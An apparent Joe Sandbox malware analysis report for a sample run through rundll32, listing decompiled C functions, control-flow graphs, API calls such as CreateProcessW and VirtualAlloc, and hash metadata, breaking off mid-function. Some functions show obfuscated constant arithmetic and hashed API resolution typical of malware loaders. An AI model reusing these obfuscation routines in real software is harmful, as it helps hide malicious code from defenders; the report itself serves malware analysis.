                                                                                                                      0x002b9806
                                                                                                                      0x002b980d
                                                                                                                      0x002b9819
                                                                                                                      0x002b981c
                                                                                                                      0x002b9823
                                                                                                                      0x002b982a
                                                                                                                      0x002b9831
                                                                                                                      0x002b9838
                                                                                                                      0x002b983f
                                                                                                                      0x002b9846
                                                                                                                      0x002b984d
                                                                                                                      0x002b9854
                                                                                                                      0x002b985b
                                                                                                                      0x002b9862
                                                                                                                      0x002b9866
                                                                                                                      0x002b986d
                                                                                                                      0x002b9874
                                                                                                                      0x002b987b
                                                                                                                      0x002b9882
                                                                                                                      0x002b9889
                                                                                                                      0x002b9894
                                                                                                                      0x002b9899
                                                                                                                      0x002b989d
                                                                                                                      0x002b98a4
                                                                                                                      0x002b98b0
                                                                                                                      0x002b98b5
                                                                                                                      0x002b98be
                                                                                                                      0x002b98c1
                                                                                                                      0x002b98c4
                                                                                                                      0x002b98cb
                                                                                                                      0x002b98d7
                                                                                                                      0x002b98d8
                                                                                                                      0x002b98dd
                                                                                                                      0x002b98e4
                                                                                                                      0x002b98f2
                                                                                                                      0x002b98fb
                                                                                                                      0x002b98fc
                                                                                                                      0x002b98ff
                                                                                                                      0x002b9906
                                                                                                                      0x002b9912
                                                                                                                      0x002b9915
                                                                                                                      0x002b9918
                                                                                                                      0x002b991f
                                                                                                                      0x002b9926
                                                                                                                      0x002b992d
                                                                                                                      0x002b9934
                                                                                                                      0x002b993b
                                                                                                                      0x002b9942
                                                                                                                      0x002b9949
                                                                                                                      0x002b9950
                                                                                                                      0x002b9957
                                                                                                                      0x002b995e
                                                                                                                      0x002b9965
                                                                                                                      0x002b996c
                                                                                                                      0x002b9973
                                                                                                                      0x002b997a
                                                                                                                      0x002b9981
                                                                                                                      0x002b9984
                                                                                                                      0x002b9987
                                                                                                                      0x002b998a
                                                                                                                      0x002b998f
                                                                                                                      0x002b9990
                                                                                                                      0x002b9998
                                                                                                                      0x002b999f
                                                                                                                      0x002b99b6
                                                                                                                      0x002b99cc
                                                                                                                      0x002b99d6
                                                                                                                      0x002b9a15
                                                                                                                      0x002b99d8
                                                                                                                      0x002b99da
                                                                                                                      0x002b99f7
                                                                                                                      0x002b9a0b
                                                                                                                      0x002b99dc
                                                                                                                      0x002b99df
                                                                                                                      0x002b99e0
                                                                                                                      0x002b99e1
                                                                                                                      0x002b99e2
                                                                                                                      0x002b99e2
                                                                                                                      0x002b99e5
                                                                                                                      0x002b99e5
                                                                                                                      0x002b9a1d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID: a+
                                                                                                                      • API String ID: 963392458-552692850
                                                                                                                      • Opcode ID: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction ID: e381018d16f91120bc0645384f3c14c520e1d1f6b3ad34424548932b01c93f16
                                                                                                                      • Opcode Fuzzy Hash: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction Fuzzy Hash: 80A10272510248EFDF59CF64C94A9CE3BA2FF44348F119219FE199A260D3B6D9A5CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(00588A68), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(00588A68), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BEA7B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 220 2bea7b-2beb35 call 2bcf25 call 2b2d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E002BEA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t41;
				intOrPtr* _t50;
				void* _t51;
				signed int _t52;
				signed int _t53;
				void* _t60;

				_t60 = __edx;
				E002BCF25(_t41);
				_v16 = 0xd33285;
				_v16 = _v16 + 0xd9cb;
				_v16 = _v16 | 0xd94823ae;
				_v16 = _v16 ^ 0xd9d95ea2;
				_v8 = 0xf9f040;
				_v8 = _v8 ^ 0x026675a4;
				_t52 = 0x46;
				_v8 = _v8 / _t52;
				_t53 = 0x2b;
				_v8 = _v8 / _t53;
				_v8 = _v8 ^ 0x000f054e;
				_v12 = 0x255c2b;
				_v12 = _v12 ^ 0x0b9b7933;
				_v12 = _v12 + 0xffff1ebc;
				_v12 = _v12 ^ 0x0bb758ac;
				_t50 = E002B2D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
				return _t51;
			}












                                                                                                                      0x002bea85
                                                                                                                      0x002bea9a
                                                                                                                      0x002bea9f
                                                                                                                      0x002beaa9
                                                                                                                      0x002beab2
                                                                                                                      0x002beab9
                                                                                                                      0x002beac0
                                                                                                                      0x002beac7
                                                                                                                      0x002bead3
                                                                                                                      0x002bead8
                                                                                                                      0x002beae0
                                                                                                                      0x002beae8
                                                                                                                      0x002beaeb
                                                                                                                      0x002beaf2
                                                                                                                      0x002beaf9
                                                                                                                      0x002beb00
                                                                                                                      0x002beb07
                                                                                                                      0x002beb1f
                                                                                                                      0x002beb2e
                                                                                                                      0x002beb35

                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 002BEB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: 70b902c0c8d22d8d979f5172c231cbe682f147a3ed3d0eed36f05227745a0748
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: 4F116736D00208FBDB14DEE6D94A8DFBFB5EB85310F108099F614A6251E7714B65AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 225 10001b80-10001b90 226 10001b92-10001b97 225->226 227 10001b9c-10001ba8 225->227 228 10001c9c-10001c9f 226->228 229 10001c04-10001c66 227->229 230 10001baa-10001bb5 227->230 231 10001c74-10001c91 VirtualProtect 229->231 232 10001c68-10001c71 229->232 233 10001bb7-10001bbe 230->233 234 10001bfa-10001bff 230->234 235 10001c93-10001c95 231->235 236 10001c97 231->236 232->231 237 10001bc0-10001bce 233->237 238 10001be2-10001bf4 VirtualFree 233->238 234->228 235->228 236->228 237->238 239 10001bd0-10001be0 237->239 238->234 239->234 239->238
                                                                                                                      APIs
                                                                                                                      • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      • Opcode ID: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction ID: 18a5c97ed4e363b13208c3a7f4c71130bffb6d6a25a92aa7c7569a15449bf2a4
                                                                                                                      • Opcode Fuzzy Hash: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction Fuzzy Hash: 7141B9746001099FEB48CF58C490FA9B7B2FB88350F14C659E91A9F395D731EE41CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 10036624-10036642 HeapCreate 241 10036647-10036654 call 100365c9 240->241 242 10036644-10036646 240->242 245 10036656-10036663 call 10035aca 241->245 246 1003667a-1003667d 241->246 245->246 249 10036665-10036678 HeapDestroy 245->249 249->242
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 100019c0-100019ee 251 10001a02-10001a0e 250->251 252 10001a14-10001a1b 251->252 253 10001b06 251->253 254 10001a83-10001a9e call 10001990 252->254 255 10001a1d-10001a2a 252->255 256 10001b0b-10001b0e 253->256 265 10001aa0-10001aa2 254->265 266 10001aa4-10001ac9 VirtualAlloc 254->266 257 10001a2c-10001a4e VirtualAlloc 255->257 258 10001a7e 255->258 260 10001a50-10001a52 257->260 261 10001a57-10001a7b call 100017c0 257->261 258->251 260->256 261->258 265->256 268 10001acb-10001acd 266->268 269 10001acf-10001afe call 10001810 266->269 268->256 269->253
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C679C Relevance: 1.6, APIs: 1, Instructions: 65processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 272 2c679c-2c6863 call 2bcf25 call 2b2d9f CreateProcessW
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E002C679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				void* _t40;
				int _t46;
				WCHAR* _t50;

				_push(_a64);
				_t50 = __ecx;
				_push(_a60);
				_push(0);
				_push(0);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002BCF25(_t40);
				_v24 = 0x639852;
				_v20 = 0;
				_v12 = 0x9647c4;
				_v12 = _v12 + 0x4343;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x0009af77;
				_v16 = 0x17e0ca;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x000f0fb4;
				_v8 = 0x429f7b;
				_v8 = _v8 + 0xffff27c2;
				_v8 = _v8 + 0xb08b;
				_v8 = _v8 ^ 0x004b6691;
				E002B2D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
				return _t46;
			}











                                                                                                                      0x002c67a4
                                                                                                                      0x002c67a9
                                                                                                                      0x002c67ab
                                                                                                                      0x002c67ae
                                                                                                                      0x002c67af
                                                                                                                      0x002c67b0
                                                                                                                      0x002c67b3
                                                                                                                      0x002c67b4
                                                                                                                      0x002c67b7
                                                                                                                      0x002c67ba
                                                                                                                      0x002c67bb
                                                                                                                      0x002c67be
                                                                                                                      0x002c67c1
                                                                                                                      0x002c67c4
                                                                                                                      0x002c67c7
                                                                                                                      0x002c67c8
                                                                                                                      0x002c67cb
                                                                                                                      0x002c67cf
                                                                                                                      0x002c67d0
                                                                                                                      0x002c67d5
                                                                                                                      0x002c67df
                                                                                                                      0x002c67e2
                                                                                                                      0x002c67e9
                                                                                                                      0x002c67f0
                                                                                                                      0x002c67f4
                                                                                                                      0x002c67fb
                                                                                                                      0x002c6802
                                                                                                                      0x002c6806
                                                                                                                      0x002c680d
                                                                                                                      0x002c6814
                                                                                                                      0x002c681b
                                                                                                                      0x002c6822
                                                                                                                      0x002c6842
                                                                                                                      0x002c685c
                                                                                                                      0x002c6863

                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 002C685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: e9aaaf208385ce4e1a09109a4024b1047fd45caa25ddecdcd7203d1e3f0f57ab
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: 2221E772900248BBCF119F95CD09CDFBFB9EF99714F008189FA1466120D7B68A64EFA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C3CBB Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 277 2c3cbb-2c3d40 call 2b2d9f ExitProcess
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C3CBB() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t37;

				_v20 = _v20 & 0x00000000;
				_v24 = 0x868838;
				_v16 = 0xb6c7ac;
				_t37 = 0x79;
				_v16 = _v16 * 0x7d;
				_v16 = _v16 ^ 0x593c5b8b;
				_v8 = 0x23929;
				_v8 = _v8 | 0xd856564b;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x67f2afdd;
				_v12 = 0x42ac5b;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x0009f0c4;
				E002B2D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
